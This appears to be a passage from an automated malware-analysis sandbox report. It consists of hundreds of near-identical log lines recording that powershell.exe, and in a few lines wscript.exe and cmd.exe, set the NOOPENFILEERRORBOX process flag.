                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
